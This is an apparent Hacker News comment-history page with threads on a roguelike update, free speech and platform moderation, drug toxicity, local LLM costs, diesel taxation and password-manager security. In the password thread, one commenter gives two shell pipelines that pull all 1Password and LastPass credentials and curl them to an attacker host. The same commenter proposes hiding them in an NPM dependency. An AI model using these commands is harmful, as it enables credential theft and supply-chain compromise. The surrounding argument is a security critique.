Hacker Newsnew | past | comments | ask | show | jobs | submit | xoa's commentslogin

As @severine said a few hours ago, lots of upvotes, zero comments, guess today between work we're all squeezing in a bit of Shattered 4.0.0 instead of HN ;). I got an incredibly lucky 7 challenge Assassin run going on the previous version that I'd forgotten about at floor 6, so I've been continuing with that to give the new one a kick. Just reached the new Imp Quest right now, trying to decide whether to try it here or do so on a fresh vanilla run to see how it goes without challenges on. If challenges apply in the vault Into Darkness in particular might be tough. Though I guess on the other hand unlike normal no point in worrying about further leveling or equipment before trying it since we get reset to zero, that's actually kind of fresh in its own way.

I agree that the new designs might just take awhile. They're definitely prettier, but right now since a lot of art hasn't been updated yet they stick out vs the older design style. I'm not sure they're as clear and readable either, though that's improved from the early redesigns, but even so I feel like the 3D-ish effects have caused a step back in contrast. That's a challenging line to walk with bulky pixel art. Still, the new terrain tiles are quite nice and general rejiggering there. I think overall once it's all updated it'll be a little slicker. Haven't seen any of the new enchants or the like yet, Prison/Caves felt mostly the same just a little more atmospheric. Troll quest was the same but his room was cooler.

One selfish thing I'd enjoy seeing as a player with [holy crap] hours into SPD over the years would be a sort of minor "trainer" mode, something that'd let you fix a few variables in a run while keeping the RNG otherwise. Basically having done near everything (though the occasional surprise is all the more delightful for that) when I go back for a game often I'm in the mood for something specific like a gardening/necromancer run or to try something silly as a build. Right now that can turn into a tiresome game of seed hunting though, you only get the right Old Mage quest 1/3 times for example and have to go through 7-9 levels each time first. And if you run it on vanilla to speed up the search, then play that seed, now you know a bunch of other info instead of just that it has the right potential, you don't go into the unknown again until the levels after. It'd be nice for vets if there was a way to just say "I want a game with Seed/Ember/Dust OM Quest" or "make the sad ghost drop a +1 whip" or "first crystal chest has a +0 corruption wand", that's it, just 1-2 seed variables overridden to be fixed but you still have no idea where they'll be or when, or know anything else about the run. Just that if you survive to find it it'll be there.


I'm a free speech absolutist (albeit one of apparently few people who actually knows what "free speech" is [0]) and I'm absolutely outraged and infuriated by this action and a long history of anti-speech actions by the USG, though this particular Administration is unprecedented in terms of censorship, general evil and authoritarianism in modern history. I also think it's unfortunate how many people in favor of all sorts of censorship now attack stawmen and treat something so vitally important as a joke like you have. The unseriousness you treat something incredibly serious with has become an endemic problem in our society, and directly inspires nihilism/fatalism/tribalism etc, feelings which in turn directly support authoritarianism.

----

0: For example, if HN bans you, shadowbans you, makes your posts dead by default, flags, or downvotes, that's all free speech.


I am not sure I see a fundamental distinction between HN censoring your speech on their platform or the government preventing you from speaking in public. Both are censoring you right? Is the difference the fact that HN is free to regulate its own platform as it wants to?

For a large part I see people using digital platforms as a primary method of expressing their thoughts and opinions. Governments in both the US and the EU have imposed restrictions on what platforms may host. I think we have not reconciled yet how to reinterpret free speech online.

Im no expert on free speech, of free speech absolutism, so please let inform me :)


HN can't put you in jail.

Freedom of association and freedom of speech go hand in hand. You can say whatever you like. You should not be arrested for it. People may choose not to associate with you, or not to do business with you, or not to amplify your speech by hosting it for you.


The USA can't put A/I in jail, since they're Italian and haven't been found guilty of any crimes in Italy .

If it was the government telling a platform to block certain speech, that would be a restriction in free speech.

The difference is that the ownership of HN has their OWN freedom to choose who they let post on here, and what they let be posted.

This is known as the 'Freedom of Association': The right to come together with other people to collectively express, promote, or pursue their common interest. This right also includes the right to accept or decline membership in the group for whatever reason they want. HN can choose to only allow whatever they choose on their site.

In the United States, this right is actually established (according to court rulings) by the same First Amendment that establishes the right to free speech.

The right to free speech does not require a private individual or company give you a platform to make your speech.


If I have a public platform and refuse to sponsor/publish/platform your speech, that is my free speech right! You don't have the right to force me to speak your words. Only the government is prohibited (by 1st amendment) from censoring/limiting speech (that does not cause or promote violence or injury to others). There are also some restrictions and protections also offered to the press (eg libel and defamation) and common carriers, along with the abomination of the DMCA.

Personally, I don't consider paid speech to be free speech, and I don't consider corporations to by humans, but the supreme court does.

Remember, facts aren't real, there is no truth, and crime is legal (in the current "Justice" Dept).


Is ICANN the government?

I don't think absolute free speech exists; there are always some limits to speech. Ideally not too many, but there are kinds of speech that I don't think you have any choice but to restrict if you want to have any kind of decent, safe and free society: threats, libel/slander, blackmail, and hate speech. Those are the kind of things that will silence, mislead or manipulate others, and are therefore by themselves a threat to free speech.

But things like criticising governments, questioning political or economic paradigms, or just making fun of powerful people, should always be legal and protected.


I think this depends on how you define 'hate speech'. Is talking about how billionaires are the scum of the earth hate speech?

I get the idea behind banning hate speech, but it gets really tricky when you try to think how to define and enforce it. Everyone agrees you need to be able to criticize groups that you don't like, so what makes it cross the line to hate speech (besides calls to violence, which would fall under the 'threats' category anyway)?

The worry is always that if you carve out an exception to free speech to protect vulnerable groups from harassment, how do you stop a future government from expanding those groups to include their political allies?


I think calls to violence usually only count as threat when they're targeted at a specific person. To me, hate speech is about creating an unsafe, threatening or oppressive situation for a vulnerable demographic group. Like saying a specific ethic group is a threat to society, or general attacks against women in general. Thing that, when repeated enough, will normalise the idea of violence or oppression against that group.

But what about similar speech against powerful groups, like billionaires? Well, they're not vulnerable or marginalised, they already have a disproportionally large voice, so they're not easily silenced. And of course being a billionaire is a choice; they can abdicate from their wealth in a way people can't do from their gender or ethnic group. So it's not the same. That said, calls for violence against them might still count as hate speech or be considered specific enough to count as threats.

There is obviously some fuzziness, but there also is with other limits to free speech, and there are courts to ultimately adjudicate that.


I agree with you that it isn't the same, and vulnerability matters.

My worry is that I can easily see an administration like the current US one claiming that MAGA Americans are the most vulnerable in the country, and they need to be protected.


Perhaps, but they don't seem to believe in free speech anyway. They're actively going after media that criticise the government, and are restricting government-funded scientists from using specific words that suggest research that doesn't fit their narrative.

>I am not sure I see a fundamental distinction between HN censoring your speech on their platform or the government preventing you from speaking in public. Both are censoring you right?

Wrong. HN is not "censoring" you at all, which requires engaging in violence (or threat of violence) against you to inhibit you from speaking in public. HN is literally engaging in Free Speech itself. Take arguably the most fundamental free speech activity in a democracy: advocating to your peers for the candidate you wish to vote for and have elected to represent you. You've researched and listened to Alice, Bob and Carol. You decide the best is Alice, and to show your support you do the quintessential thing and put out a Vote For Alice lawn sign on your lawn. That's obviously free speech right? Now what if instead some volunteer from Alice's election team comes by and asks you if they can put up a sign on your property, and you say yes. That too clearly involves your free speech rights, even if you didn't pay for the sign. Now say Bob & Carol's campaigns turn up, and they ask to put up signs on your lawn too. You don't support them and say no. Have you censored them? Of course not, that's ridiculous. Free speech isn't "everything is equal nothing matters", everyone is trying collectively to iterate towards truth and value by making their cases and listening, without general use of force. To say that "I think this idea/person/item is the best choice" by definition is exclusionary, it's also saying "I think all the other ideas/persons/items are NOT the best choice". It can also simply be "I wish to engage with these subjects, not those". You can make a forum dedicated to airplanes & cats, and ban anyone who starts threads on boats & lizards. You may have nothing whatsoever against boats or lizards, but that's not what you personally want to focus on on your own forum you're paying for.

Hacker News is the private property of its owners. They have their own free speech rights. Exercising those rights is not censorship.

Others in turn are free to use their property and/or their voice on public property to make their cases, and they can try to convince you and vice versa. And there can be social consequences, if someone really dislikes your speech maybe they don't invite you to dinner anymore and urge others to do the same, who might agree (or go the other way, or just ignore it). Humans can get passionate sometimes. But by keeping violence out of the whole thing outside of narrow exceptions that undermine the approach itself, room is preserved for minds to be changed and rifts mended years or even decades later, and for ideas to come back around if someone cares enough.

Government enforcing things though always involves violence, either directly or one or more orders removed. But a general monopoly on the legitimate use of force is a defining feature of government. If government doesn't like Alice, and tells you take down the sign, or else, that's fundamental infringement. They're closing down the whole cycle (if a private person did that it'd also be a bunch of other crimes AND infringement, because private persons are not allowed to use violence against others at all by default outside of narrow exceptions). And if government tells you "oh you can leave up the sign about Alice, but it's not fair you censor Bob & Carol, you must put up signs for them too. Or else." that'd be equally infringing censorship. If everyone has a sign, it's the same message as nobody having one. It's still suppressing "I think Alice is the best choice".

>For a large part I see people using digital platforms as a primary method of expressing their thoughts and opinions.

It is easier and cheaper than any point in human history to put up your own website, including your own forum to try to form a community around. You have no right to an audience though.

>Governments in both the US and the EU have imposed restrictions on what platforms may host.

What? What restriction has government in the US imposed beyond the long standing and unchanged exceptions that prove the rule (which essentially boil down to threats of violence, comms integral to crime, defamation AFTER a court case to prove it, serious violations of personal self with zero public value like CSAM, and purely commercial speech engaging in fraud)?

>I think we have not reconciled yet how to reinterpret free speech online.

There is nothing to reinterpret. We've gotten it fine since the passage of Section 230. The problem are constant efforts to suppress what we've already got, in some cases coupled with completely orthogonal issues like failure to enforce ancient anti-trust legislation.


> The unseriousness you treat something incredibly serious with has become an endemic problem in our society

Testosterone down 50% since 1970.

Childishness up slightly more than that.


I'm sure those two stats are definitely related. What a childish thing to say.


>The puer covets independence and freedom, opposes boundaries and limits, and tends to find any restriction intolerable.

Isn't that the opposite of this?


The word "testosterone" is not mentioned on this page at all. Nor any other hormones.

Well I was just noting a suspicious correlation. (Also childishness is up a lot more than 50%, in case my tone was unclear :)

But you've given me quite an interesting endocrinology research project here. Last I heard, the root cause of the drop remains unknown. (And it's still dropping.)


>On hardware, it's very expensive to purchase anything which can provide a fraction of the performance of a subscription.

One of the basic questions/concerns here though is that it's not like the AI places are getting the GPUs for 10x less. It's true they have some economies of scale, but they also have some waste, and frankly in this particular case it's not clear they get that much gain over what a lot of businesses could achieve. The biggest traditional gain for central providers is that a lot of typical computing usage is burst-y, and in turn local kit might be underutilized. But with LLMs heavy users tend to use them all the time assuming their tokens allow it (and in the case of local hardware there's nothing stopping you, quite the contrary), they can use it directly interactively or leave them to go overnight on something too.

So it's reasonable to suspect that the reason subscriptions are only a fraction of the cost is that we're in a bubble seeing these companies losing money in an attempt to gain some sort of durable advantage. Just as every previous time, there is the chance that the music stops at some point, and they need to crank up pricing or pull other schemes to actually make money. Of course, it can be a good deal in the mean time, you basically get to suck down investor money for nothing, but it's also not unreasonable to at least be consider fallbacks. Even beyond questions of control and risk etc. I know at least a few places that are now genuinely considering questions like "what happens if a datacenter we depend on gets droned" that would have never had an iota of thought devoted to them even 5 years ago.

>On electricity, this is a surprising cost center depending on location. A system with just one 5090 can easily pull 1kW, and to achieve usable performance for a workplace is going to require dozens of machines. This can represent an extra $10-20k in electricity in cheap places.

I don't think that's "surprising" at all, everyone knows about power use. And this seems like it gets heavily into what you're defining as "usable" and is also more useful to define in terms of cost-per-employee vs total. Obviously a bigger business will have a higher line number total even if the cost per employee is identical, but simultaneously can be expected to be making more revenue to pay for it.

If we're defining an average of a dedicated 5090 pulling 1 kW for every single employee (presumably some people wouldn't use it all the time, but others would then pull the compute for other work), running 24/7 (to cover people running stuff when they're away), then that'd be 8760 kWh per year. At my not particularly cheap New England location that'd be about $1900 per employee per year at the generalized residential rate (~$0.22/kWh), or $156 per month. That doesn't seem radical if it really does boost productivity. However, there is a lot of room to go lower. I'd expect a business to run backup anyway, and these days there are a lot of incentives to do that at least partially with batteries. That also opens up rate shifting as another way to pay back the cost. If we change to time of day pricing, that's 8 hours of peak pricing with the rest off-peak. 8 kWh of battery can now be had for a few thousand. And the off-peak rate is only ~$0.14/kWh, cutting the cost per year by about $700 to $1200 per employee per year. Solar power is also usually far more valuable to use yourself then sell back to the grid, and also continues to plummet in price.

None of this is to say that it makes sense for every place at all, but it's close enough to the the line that the math is at least worth exploring, or could at least lower the cost enough to be worth it given other things. It really comes down to how much extra value the company (or individual) expects to come out of it per month.

>In California or Europe this could be $30-60k per year.

Dunno about Europe, but at the kinda prices I see for California I'm really surprised more places aren't trying to move a lot of usage to battery+renewable.

>The only real moat that local LLMs have right now is privacy.

I don't think resiliency and control are things that can be taken for granted anymore, particularly on the global scale. War and terrorism is getting worse again. International relations are getting nastier, and governments have the power to just order places cut off. If LLMs aren't particularly valuable to a business, then why an expensive subscription? But if they are particularly valuable, then insurance is something leadership should be contemplating.


>It's interesting that diesel is taxed more than gas in the US. It's the other way around in France.

Although in the US there is commonly an "on-road"/"off-road" split, at least in more rural/agricultural regions or states like mine. The diesel is dyed so it can be distinguished if inspected, and the off-road diesel is either not taxed at all or taxed at a much lower rate. The intention is to not tax agricultural usage, and also that it doesn't make sense anyway to tax tractors and other equipment (almost all using diesel still) used in fields and woods for road maintenance. In contrast, the biggest on-road use of diesel in the US is commercial trucking of various flavors, and those really do do much more damage to roads (and if anything aren't taxed proportionally at all). One of the very rare times the politics and costs have even mildly aligned.

It'd be nice if we could have more electrification in off road agricultural equipment as well but even putting aside all issues of energy density (which are solvable via quick swap packs/trailors if nothing else, and that's much easier to engineer in a tractor form factor and much easier to have a setup for at a typical farm) the weight will be a challenge, soil compaction is a very serious concern for most ag. Maybe electrification along with extra R&D/gov support can drive down the cost and improve the reliability of continuous track (or split continuous) for ag applications. John Deer has developed a few models with it, but the majority up and down the spectrum use tires. Combining the two though could allow for electrification with the same (or actually lower) ground pressure.


Diesel for agricultural use is subsidised almost everywhere in the west to some degree.

France removed taxes on non-road diesel this year and paid per-liter-subsidies on top.

Keeping independent local agriculture is quite existential for any state, so this is understandable despite being morally questionable in my opinion.


Taxing less =/= subsidising

Any externalized cost that you tolerate as regulator is already an indirect form of subsidy in my view. E.g. allowing a mining company to dump tailings in the next river is exactly the same as paying for proper disposal with tax money (from a company finances point of view).

So any untaxed air polluter/CO2 emitter enjoys an indirect subsidy already.

But in the french case, farmers and fishermen got paid 15-30 cents per liter on top (removing all ambiguity).


In our case we use both Dropbox and also have a few teams using the 1P.com sync in addition. So we value both, plus just plain still don't like the 1P8 software itself.

Of course with the original Dropbox based sync, a concern is that Dropbox itself isn't set in amber, at some point it might get rug pulled and sadly 1P never introduced WebDAV or some other self-hosted option before subscription/VC fever set in. And I suppose that macOS continues to move along too. 1P7 on the latest and final version is Apple Silicon native and through a lot of major transitions doing nothing exciting, so it might well keep running for a long time. But the browser extensions will probably stop working at some point which is going to be another big line for a lot of people, and legitimately because it's a not insignificant bit of security.

Anyway, I mean, not like one couldn't keep running it a long time via various layers, but I figure probably time to at least survey the landscape on moving on :(


>Since when were private companies part of the Judicial Branch?

What part of GP's quote from the article gets you to "private companies are part of the judicial branch"? The judicial branch wasn't involved there, only the executive. All of us, private individuals or organizations, have the right to challenge any requests by the executive branch (and by the same token, unless forbidden by law we can also just voluntarily go along with its requests). The judicial branch can then rule on who is right. If the executive wants to force it then it can go to the judicial branch up front and get an actual for real warrant. If it wants to bypass judicial review, then it doesn't have the same legal force either.

Here, it asked T-Mobile and Google for a bunch of stuff on a journalist. T-Mobile said sure. Google said no, come back with a warrant.

>I don’t remember that part of the Constitution.

Might want to reread if it's been awhile for you.


I get what you're saying, but "the company reviews each request for data it gets to ensure it is legal" just sounds like something a judge should do, no?

>but "the company reviews each request for data it gets to ensure it is legal" just sounds like something a judge should do, no?

No, unless you're arguing that the government should be barred from even making voluntary requests at all? I'm not sure I'd agree with that either though, there's plenty of times where a government request really is just an honest "request" for pure info, like a poll or survey or something on how a program is working and any feedback participants want to give. Though of course it's also easy to see how things like 3rd party doctrine have expanded in effect over time and gotten badly abused, particularly in combination with other levers government has. Perhaps that doctrine should be abolished and the government shouldn't be able to make "voluntary requests" for anything that'd touch on a criminal or civil investigation (so they'd still be able to ask for surveys and the like), but that'd require some careful consideration. Or maybe there are some reasonable limits in terms of data automatically and unavoidably collected (like cellular location) vs data voluntarily shared.

Regardless however, if the government wants to compel somebody to comply, well that's literally what a warrant (or court order) is for right? If the government chooses not to involve a judge in a request for data that'd require a warrant to force, then yeah of course the private party they're asking gets to decide whether to voluntarily go along with that or not. That's the trade.


> No, unless you're arguing that the government should be barred from even making voluntary requests at all?

IMHO the third-party doctrine is an area where legislators ought to be passing laws to broaden constitutional protections, in suitably nuanced way, to keep up with the times. In the modern age, people reveal a great deal of information about themselves to third parties in the course of carrying out mundane tasks.

The idea that fourth amendment protections apply to physical mail, but not to e-mail [1] doesn't really make much sense.

Unfortunately this is the sort of thing change that really needs to come from legislators, and the legislative process isn't very effective at the moment.

[1] except for the 0.1% of people who self-host their own e-mail server in their own home


> ...but "the company reviews each request for data it gets to ensure it is legal" just sounds like something a judge should do, no?

This is assuming the first pass is before a judge. They're circumventing this by going straight to the companies, as noted by the following blurbs:

> This time, DHS utilized a different method that didn’t require approval from a judge, only a sign-off from a DHS official.

and

> It also instructed the recipients of the summons to keep it secret.

In most cases, a company's legal team will attempt to validate the legality of a request because, if they just acquiesce, it becomes a legal problem for them to turn over data without that validation of legality - which can have financial repercussions.

In those cases, the government most often will not (and cannot) step in to save them from the financial blowback (i.e.: the government got what it wanted; it's not their problem, now).


Company legal departments should absolutely review requests and make sure they're legal before handing over data.

If they suspect the request isn't legal, they can refuse it, and then it can be escalated to a judge.

Are you suggesting that every request should go through a judge before it gets sent to a company? That would be great, but even then, different judges interpret laws differently, so a company will still do a legal review before deciding whether or not to comply.


No, the stock market is not gambling (or at least hasn't been, need not, and should not be). The stock market is a positive sum game, linked to the growth of the economy as a whole. Humanity is very, very far from the maximum possible utilization (and maximum efficiency) of matter and energy in this solar system or even this world. What decisions we make matters a lot in how well/how fast/whether we continue to get richer, so we've tried however ineptly and haltingly to make systems that reward short and long term gains balanced against current use priorities. And have failed plenty, and may yet fail completely. But it's perfectly possible for everyone to win, for the whole world to get "richer" (defined as being better able to meet human goals & desires within a given mass/energy budget or have more or both). Investments can yield >1x total returns. And that has indeed been the case, that's the story of modern civilization.

Gambling in contrast is strictly zero sum at best and always negative sum in reality. A group of people puts in 1x capital, the house takes a cut of that, and then the <1x gets unevenly redistributed and that's it. Nothing is generated, the collective set of people is strictly worse off after the gamble, with a few making gains off the backs of loss distributed amongst everyone else. All while hacking dopamine reward centers that didn't evolve for that.

It appears to be the case that we can't perfectly stop 100% of all IRL gambling without a cost that exceeds the benefit. That's life. But that doesn't mean we shouldn't be picking as much low hanging fruit as possible, same as with other negative sum brain hacks.


> or at least hasn't been

The stock market was so gambling that we had 'bucket shops' where people would just buy and sell fake stocks that tracked real stock prices.

Now we have public companies directly selling shares with no voting rights and no plans to ever pay dividends, which is the same thing.


I was joking (mostly). The stock market absolutely is positive sum, but at the same time things like 2x levered short VIX ETF's exist...

I mean sure, people can find ways to use all sorts of events and activities for gambling, but that doesn't mean the events/activities themselves are. And the sentiment you expressed joking has gotten repeated with (afaict) total seriousness in these threads with some regularity (insurance is another one that people incorrectly bring up trying to defend gambling). So I think it's pretty important to differentiate between everything, and to help pass on some of the history as humans have grappled with this in the past. Insurance for example has the concept of requiring an "insurable interest" to help avoid negative incentives and gambling. You can insure your own house against burning down, but you can't take out a policy against some random stranger's house.

Yeah, I hear you. The "stock market is rigged, insurance is a scam" vibe is strong here. HN has really turned into a sounding board for bitter people who think the whole world is out to get them.

By a strict definition of gambling, the stock market is gambling: It's a monetary wager placed on an unknown future event. Just because it (often) is positive sum doesn't mean it isn't an unknown that people are betting money on.

>By a strict definition of gambling, the stock market is gambling: It's a monetary wager placed on an unknown future event.

No, that is not a strict definition of gambling, that is your own loose, personal and casual definition. The strict definition of the gambling in question under Arizona law (the subject of this article) is I believe partly under 13-3301 [0] and has a number of criteria that clearly differentiate it from investment (whether it be stock, loan by a bank or any other entity/person, or whatever else). Other polities will have their own flavors, but all of them are aimed at a net negative, destructive social activity. That's the whole point of regulating it, it's not some metaphysical philosophy thing about life having uncertainty it's about long experienced concrete harm. Trying to argue that buying shares in a broad index fund is a "wager that a meteor will not hit the Earth" is uninteresting.

>Just because it (often) is positive sum doesn't mean it isn't an unknown that people are betting money on.

It does actually! Positive sum changes everything in terms of collective incentives, strategies available and how investors can hedge risk. You may not choose to make use of all the tools available, but that doesn't make investment the equivalent of gambling. Part of the whole point of markets is to manage changing risk and information discovery (including dead ends) such that we still continue to grow overall.

----

0: https://www.azleg.gov/ars/13/03301.htm


Pointing that out makes as much sense as "so you're against drugs? Did you know Tylenol is a drug? Ha checkmate!"

Great example, because Tylenol is more dangerous than nearly every illegal drug.

Today I learned on the Internet that Tylenol is more dangerous than meth, cocaine, or fentanyl.

Wait, no I didn't. That's absurd. Tylenol can cause long term health issues if used in excess (or death, for extreme overdoses), but most illegal drugs are illegal because they can cause immediate death even at normal usage amounts.


> but most illegal drugs are illegal because they can cause immediate death even at normal usage amounts.

Huh. The amount used on the street is not a "normal usage amount". Most fentanyl deaths are due to the fact that the medical usage amount is not something you can generally measure with your dealer's scale or the scale you bought at the local head shop (we, as paramedics, would typically administer 50-100 micrograms, and for anything more than 300 we needed to consult with a physician).

In those use cases, properly dosed, fentanyl is an exceptional, powerful, and short-lived, analgesic.

When people die from fentanyl ODs they're taking dozens, hundreds, or more, than the "normal usage amounts".


You would have had a better point if you didn't include cocaine which is only really dangerous for people with severe heart problems or by using it in combination with depressive drugs that it temporarily suppresses.

If cocaine was really a problem then C-suites and politicians would be regularly dieing.


Meth used to be available over the counter in pharmacies in the US.

No drug I'm aware of causes immediate death in normal usage, except perhaps those used for lethal injection. Would you like to elaborate on that? Tylenol, on the other hand, causes an unpreventable (no antidote) slow drawn out death over about a week, where your body will be slowly decaying and you have time to say goodbye to all your loved ones, if you take a few times the normal dose by mistake


Now do H20, very harmful at high amounts.

I'm not chemistry-minded enough to know what H20 would be, but I suspect you meant H2O. ("O" as in oxygen, not "0" as in zero.) (and of course the "2" would normally be subscript, but this is HN)

For those who downvote: it's true. Look it up.

It's not true, as "dangerous" doesn't mean what you seem to think it means. Just because Tylenol (acetaminophen) is highly toxic in actually quite small doses doesn't make it as dangerous as vicodin or morphine or heroin or meth or fentanyl.

A drug is dangerous when it is toxic at an easily obtainable dose AND there is a clear incentive for people to consume it in that dose, such as addiction and tolerance. While acetaminophen is unusually toxic at doses only slightly higher than regular treatment doses, there is actually very little that compels people to use those doses, and acetaminophen toxicity is not an epidemic-level health problem the way many other drugs have become.


Acetaminophen overdose does actually have a surprisingly high rate of occurrence. A lot of people don’t realize how narrow the therapeutic band is.

Doubling your meds on a bad pain day can put you way beyond the safe limits. People think it’s safe because basically every other OTC has a huge therapeutic band, and double dosing is not recommended but not really dangerous.

CDC estimates it at 56,000 ER visits a year, 26,000 hospitalizations, 458 deaths, about a hundred unintentional deaths per year. As a point of reference, it’s about 3 accidental overdose deaths per child that dies from being locked in a hot car.


This sounds like a rationalisation to me. People take Tylenol for pain. If they're still in pain, they take more of it. Tylenol doesn't mitigate all types of pain so people might think they need more. This happens, and then they die. It happens surprisingly infrequently considering how abnormally dangerous the drug is, but it still happens.

Tylenol only works for relatively low levels of pain, which tends to be relatively short term. So abuse is not very common, and even with chronic pain, Tylenol overdosing kills quite quickly, it doesn't have time to become a habit that takes down entire families together with the chronic pain sufferer.

Either way, we don't have to assume, we can directly check the numbers. Per another commenter, Tylenol kills about 458 people in the USA every year. In contrast, death from overdose on illegal stimulants was estimated at ~33.000 people in the USA.

Now, is it fair to say that Tylenol is more dangerous than marijuana? Of course. But to say it's more dangerous than most illegal drugs? Obviously not.


I am not a physician, though I have a Masters in Biomedical Science and was a paramedic for 14 years.

I have a very difficult time taking an argument plausibly that compares Tylenol (acetaminophen, an antipyretic analgesic) to illegal stimulant use (immediately following a discussion on fentanyl, which is an opioid - about as close to opposite a stimulant as possible) - i.e. generally amphetamines.

Or comparing Tylenol to marijuana in a very apples and oranges comparison - Tylenol's dangers come from very direct hepatotoxicity (i.e. liver damage), versus marijuana's most real risks coming from impairment and intoxication (driving, judgment, panic) and their effects than toxicity of the drug itself.

It's all mixing and matching in a way that doesn't make for a sensical argument.


I was responding to someone who said Tylenol was more dangerous than "most illegal drugs". Since the only danger of Tylenol is death from overdose, I searched for some data on deaths from Tylenol overdose and deaths from illegal drugs - and happened to find data for deaths from "illegal stimulants" grouped together - so used that.

Of course, most illegal drugs, even very light ones like marijuana, have other risks, like DUI or the general ills of addiction (money issues, increased criminality from the desperation of getting another hit, etc). But even ignoring those, I thought the death numbers make it very clear that Tylenol is nowhere near "less dangerous than most illegal drugs".


I wonder what the death rate on those other stimulants would be if they were issued the same way, in regulated pharmacy stores.

I know that a lot of illegal drug overdoses are caused by people who thought they were taking a normal dose but got the wrong substance, wrong amount or wrong concentration from their dealer - who in many cases also didn't know about the discrepancy because of unreliable supply chains and difficulty of testing, both caused by illegality.


Again, that's missing the point of drug regulation. There's plenty of substances even more dangerous than Tylenol, but aren't banned. "Drugs" are banned due to a combination of (perceived) harm to user/society, potential for abuse, as well as toxicity. That's why there's plenty of substances more toxic than Tylenol, but aren't banned.

But that's missing the point of the discussion. Yes things are banned based on perceived harm instead of actual danger, that's the point of the discussion.

It's hard to give a big enough :rolleyes: for this nihilistic bullshit being spouted in 2026. In fact I'm going to go further: I accuse you lrvick of active maliciousness and trying to aid illicit access and discourage people from improving their security, because you have no excuse not to know better.

>All they would need to do is install a wrapper for sesame that waits for the next database unlock and exfiltrates all passwords in plain text to a pastebin somewhere.

"""All""" they need is to get root? Most people access all key stuff on their own devices, and for the vast ultra super majority of the population and vital sites if their personal trusted device is rooted it's over regardless. Your "Now as an attacker if I want to get the users whole database of 100 passwords I must trick them to tapping a blinking smartcard or touchid 100 times" is total fucking make believe, completely ignoring normal things like RECOVERY FLOWS. If you have root on someone's computer and phone you have access to their email and probably messaging as well, and that will suffice to get into nearly everything including the majority of financial institutions (which even now have massive ones that don't even support HSMs at all, let alone leave no recovery route! looking at you Charles Schwab, with total client assets in excess of $12.5 trillion at the start of this year [0]). There isn't any need for "100 times" because most people don't have 100 different critical accounts, rather single digits or even just one actual one that has things like money or comms.

>This is how I have been doing password management for over a decade with password store, the standard unix password manager. That tiny shell script is the -minimum- security any password manager must have.

Literally laughing out loud here. If it's not easy enough for my friends in their 70s to use and like it's WORTHLESS to most security. Including on some level mine or yours, because security has key social/network effects beyond just individuals, stolen money, information, and access is used to fuel further security threats. Job #1 is to make something people like and works with most of what already exists. Otherwise it's yet another case of "ROTATE PASSWORDS EVERY 2 MONTHS NO USE X NUMBERS OH ALSO Y SPECIAL CHARACTERS NO NOT LIKE THAT" which results in everyone just leaving stuff on sticky notes on their screens and doing the bare minimum to fool the system and using the same thing or minor variants everywhere. Theorycrafted garbage made for robots not humans.

>I submit with a straight face that they have never let any capable security engineers near their products. They have a negligent design end to end and must not be replicated.

I submit with a straight face you are either literally working for a hostile agency to spread disinformation or you have serious neurodivergence or you are seriously and dangerously bubbled with an (un)healthy splash of Dunning-Kruger mixed in.

----

0: https://pressroom.aboutschwab.com/press-releases/press-relea...


Who needs root? You seem to be under the impression the status quo password managers are reasonably secure for anyone, technical or otherwise.

Exfiltrate all plaintext credentials from 1password:

op list items \

  | jq -r '.[].uuid' \

  | xargs -n1 bash -c 'op get item "$1"' -- \

  | curl -F 'p=<-' https://attacker.com >/dev/null 2>&1

Exfiltrate all plaintext credentials from lastpass:

lpass ls \

  | grep -oP '(?<=id: )([0-9]+)' \

  | xargs -n1 bash -c 'lpass ls | grep "id: $1]"; lpass show $1' -- \

  | curl -F 'p=<-' https://attacker.com >/dev/null 2>&1
Stick one of those in a dependency of a dependency of a dependency of a popular NPM package and you can get access to developer accounts at every sector of the tech industry.

Super easy to avoid with minimal change to user experience, and yet no one did because "no one else does".

Except for Mooltipass and Password Store, which unfortunately no one has heard of. It is the popular options with billions of dollars not doing the basics the niche open source ones do that is so unforgivable.

I just wish to not see others repeating those mistakes and putting users at increased risk for no reason. I know someone personally who had their savings account wiped out because malware dumped their lastpass database. A malicious browser plugin to sniff the master password is all it takes without a hardware anchor.


You have to both install and explicitly enable the 1Password CLI, both steps no “normal” user is going to take unless socially engineered to.

https://www.1password.dev/cli/get-started

And getting secrets using it requires explicit authentication with password/fingerprint/etc (I forget if it’s per item or per process, but still).


Those are of course just minimum viable proofs of concept for users with the CLI installed because they are succinct. Real malware could of course install the CLIs for the user helpfully or just directly access the database the next time it is unlocked and dump everything just as easily. A malicious browser plugin to dump the master password to bulk decrypt works just as well.

Decrypting -all- passwords any time you decrypt -any- password under the hood is an irresponsible design for a password manager, especially on modern hardware with so so so many other options that enforce rate limiting, hardware anchored encryption, and physical user consent.

Performative 2FA for every secret like 1password does when the binary has direct access to bulk decrypt all secrets in plain text with a key in system memory is a very strange choice given you could just have the hardware doing the individual decryption for a single secret instead of exposing the secrets that can bulk decrypt the whole database.


Well, they’re not minimum-viable if they don’t work, which they won’t for most users. It’s not a simple matter of the database being unlocked or locked, as I say it’s at least a per-process authentication, protected by the 1Password daemon. I’m not saying it’s a perfect system, but exaggerated mischaracterisation, with no apparent thought to the experience of the average user, doesn’t help your argument. You don’t seem to put much value in memory protection or process sandboxing. Yes with enough exploits you can do anything, but that’s true in any case. The fact is, 1Password is good enough for most people, and even at least one bank that I’m aware of. I’m willing to be convinced of a better implementation, but the fact you’re so scathing of something that works and has UX benefits over per-secret keying is off-putting. All design is trade-offs.

While figuring out how to set up credential management for AI, I discovered 1Password CLI, and it terrifies me how it requires giving full account access for 10 minutes to the entire terminal! They seem to think the terminal environment should be treated the same as an app running with macOS protections, and that it's expected user experience to match how the GUI app operates. [1] I think that posture is wildly irresponsible, and that the 1Password GUI authorization dialog should specify and allow access only once to the items requested from CLI.

I don't understand why anyone would use LastPass. [2]

[1] https://www.1password.community/developers-69/security-conce... [2] https://en.wikipedia.org/wiki/LastPass#Security_incidents


Sticky notes is probably absolutely fine security wise if you’re not in an office/shared space.

The problem with sticky notes isn't that you have a physical note with your password - it's that the main benefits of a password manager are a) giving you long, complex passwords that can't be guessed, b) giving you different passwords for every service to protect from leaks, and sticky notes are terrible at doing that at any scale, especially when you can't autofill them to the appropriate website.

Granted, a lot of services basically design their service for the common denominator of people using sticky notes by instituting rate limits, requiring 2FA, etc.


Not saying your VM approach isn't right for you, but:

>and because there's no performant way to share disk space for data with MacOS

Have you tried a ZFS partition? If it's a desktop system use iSCSI to network storage (I'm not running Linux directly on my Studio or M4 mini but I still put my Home folder on the network)?


Or good old FAT+symlinks from the MacOS partition might be sufficient, if you don’t need large files. NTFS, ironically, is pretty stable via FUSE on Mac if you need more than FAT allows.

